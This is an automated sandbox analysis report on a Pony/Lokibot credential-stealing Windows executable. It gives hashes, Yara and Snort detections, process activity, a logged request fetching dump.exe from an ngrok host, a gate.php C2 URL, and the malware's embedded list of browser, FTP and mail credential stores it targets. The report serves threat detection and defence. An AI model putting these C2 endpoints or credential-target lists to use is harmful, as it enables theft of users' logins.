
Analysis Report eQDy6dGVwQ.exe

Overview

General Information

Sample Name: eQDy6dGVwQ.exe
Analysis ID: 376014
MD5: eb2fbc15dfb24af75c431b7525fed6e7
SHA1: f060052cf7ee32a7aa2fa17f9f749880b70ffff3
SHA256: 5ee70bdf6cfa9c2742889a7c724fa6940e40c64d6ab420303ea6e031ae3d6ce4
Tags: exe, Pony

Detection

Lokibot Pony
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Lokibot Info Stealer
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Pony
Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • eQDy6dGVwQ.exe (PID: 1316 cmdline: 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' MD5: EB2FBC15DFB24AF75C431B7525FED6E7)
    • cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
eQDy6dGVwQ.exe | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
eQDy6dGVwQ.exe | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0x12f97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x151b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x127b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0x12dda:$s3: POST %s HTTP/1.0
  • 0x12e03:$s4: Accept-Encoding: identity, *;q=0
  • 0x12f10:$s4: Accept-Encoding: identity, *;q=0

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x31b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0xdda:$s3: POST %s HTTP/1.0
  • 0xe03:$s4: Accept-Encoding: identity, *;q=0
  • 0xf10:$s4: Accept-Encoding: identity, *;q=0
00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0xf97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x31b3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x7b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0xdda:$s3: POST %s HTTP/1.0
  • 0xe03:$s4: Accept-Encoding: identity, *;q=0
  • 0xf10:$s4: Accept-Encoding: identity, *;q=0
00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
Process Memory Space: eQDy6dGVwQ.exe PID: 1316 | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.0.eQDy6dGVwQ.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0.2.eQDy6dGVwQ.exe.400000.0.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0.0.eQDy6dGVwQ.exe.400000.0.unpack | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0x13bda:$s3: POST %s HTTP/1.0
  • 0x13c03:$s4: Accept-Encoding: identity, *;q=0
  • 0x13d10:$s4: Accept-Encoding: identity, *;q=0
0.2.eQDy6dGVwQ.exe.400000.0.unpack | pony | Identify Pony | Brian Wallace @botnet_hunter |
  • 0x13d97:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x15fb3:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
  • 0x135b9:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
  • 0x13bda:$s3: POST %s HTTP/1.0
  • 0x13c03:$s4: Accept-Encoding: identity, *;q=0
  • 0x13d10:$s4: Accept-Encoding: identity, *;q=0

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: eQDy6dGVwQ.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: eQDy6dGVwQ.exe | Virustotal: Detection: 84%
Source: eQDy6dGVwQ.exe | Metadefender: Detection: 89%
Source: eQDy6dGVwQ.exe | ReversingLabs: Detection: 96%
Yara detected Pony
Source: Yara match | File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY
Machine Learning detection for sample
Source: eQDy6dGVwQ.exe | Joe Sandbox ML: detected
Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack | Avira: Label: TR/PSW.Fareit.iloen
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack | Avira: Label: TR/PSW.Fareit.iloen
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040A712 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,0_2_0040A712
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D3BE
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040BC36 CryptUnprotectData,LocalFree,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,lstrlen,StrCmpNIA,0_2_0040BC36
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040A557 WideCharToMultiByte,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,CryptUnprotectData,LocalFree,73D5A680,0_2_0040A557
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040A96D CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,0_2_0040A96D
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040CE3D lstrlen,CryptUnprotectData,LocalFree,0_2_0040CE3D
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040AB24 lstrlen,CryptUnprotectData,LocalFree,0_2_0040AB24
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004043DC CryptUnprotectData,LocalFree,0_2_004043DC
Source: eQDy6dGVwQ.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004051E3 FindFirstFileA,lstrcmpi,lstrcmpi,FindNextFileA,FindClose,0_2_004051E3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004041A6 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_004041A6
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00404E73 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404E73
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00408AE5 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_00408AE5
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409832
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00408961 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_00408961
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2014562 ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 192.168.2.4:49725 -> 3.13.191.225:80
Source: Traffic | Snort IDS: 2014234 ET TROJAN Fareit/Pony Downloader Checkin 3 192.168.2.4:49725 -> 3.13.191.225:80
Source: Joe Sandbox View | IP Address: 3.13.191.225
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: global traffic | HTTP traffic detected: GET /dump.exe HTTP/1.0 | Host: 63e2e5290bcf.ngrok.io | Accept: */* | Accept-Encoding: identity, *;q=0 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: global traffic | HTTP traffic detected: GET /dump.exe HTTP/1.0 | Host: 63e2e5290bcf.ngrok.io | Accept: */* | Accept-Encoding: identity, *;q=0 | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Source: eQDy6dGVwQ.exe, 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: eQDy6dGVwQ.exe | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: 63e2e5290bcf.ngrok.io
Source: eQDy6dGVwQ.exe | String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://63e2e5290bcf.ngrok.io/dump.exe
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://63e2e5290bcf.ngrok.io/gate.php
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://https://ftp://operawand.dat_Software
Source: eQDy6dGVwQ.exe | String found in binary or memory: http://www.ibsensoftware.com/
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud:

Yara detected Pony
Source: Yara match | File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: eQDy6dGVwQ.exe, type: SAMPLE | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, type: MEMORY | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Identify Pony Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004121E9 0_2_004121E9
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00402EFD 0_2_00402EFD
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: String function: 00404351 appears 51 times
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: String function: 00401D71 appears 139 times
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: String function: 00410808 appears 42 times
Source: eQDy6dGVwQ.exe, 00000000.00000002.658546222.0000000002B20000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs eQDy6dGVwQ.exe
Source: eQDy6dGVwQ.exe, 00000000.00000002.658653658.0000000002C10000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs eQDy6dGVwQ.exe
Source: eQDy6dGVwQ.exe, 00000000.00000002.658653658.0000000002C10000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs eQDy6dGVwQ.exe
Source: eQDy6dGVwQ.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: eQDy6dGVwQ.exe, type: SAMPLE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000000.649064659.0000000000414000.00000008.00020000.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/1@1/1
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D3BE
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_2_00402968
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,0_2_00402CE7
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_01
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File created: C:\Users\user\AppData\Local\Temp\4066921.bat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Source: eQDy6dGVwQ.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: eQDy6dGVwQ.exe | Virustotal: Detection: 84%
Source: eQDy6dGVwQ.exe | Metadefender: Detection: 89%
Source: eQDy6dGVwQ.exe | ReversingLabs: Detection: 96%
Source: unknown | Process created: C:\Users\user\Desktop\eQDy6dGVwQ.exe 'C:\Users\user\Desktop\eQDy6dGVwQ.exe'
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Data Obfuscation:

Yara detected aPLib compressed binary
Source: Yara match | File source: eQDy6dGVwQ.exe, type: SAMPLE
Source: Yara match | File source: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.649049920.0000000000413000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY
Source: Yara match | File source: 0.0.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.eQDy6dGVwQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,0_2_00410065

Hooking and other Techniques for Hiding and Protection:

Drops / launches Pony Loader self-deletion script - malware possibly based on Pony Loader leaked source code
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File dump: 4066921.bat.0.dr 3880EEB1C736D853EB13B44898B718AB
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004051E3 FindFirstFileA,lstrcmpi,lstrcmpi,FindNextFileA,FindClose,0_2_004051E3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004041A6 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_004041A6
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00404E73 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00404E73
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00408AE5 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_00408AE5
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409832
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00408961 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,FindNextFileA,FindClose,0_2_00408961
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_004045FD
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,0_2_00410065
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0040F984 mov eax, dword ptr fs:[00000030h] 0_2_0040F984
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,0_2_004105D6
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0041032D lstrcmpi,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,72A85300,ImpersonateLoggedOnUser,RevertToSelf,72A75000,CloseHandle,0_2_0041032D
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\4066921.bat' 'C:\Users\user\Desktop\eQDy6dGVwQ.exe' '
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_004044D2
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_004045FD
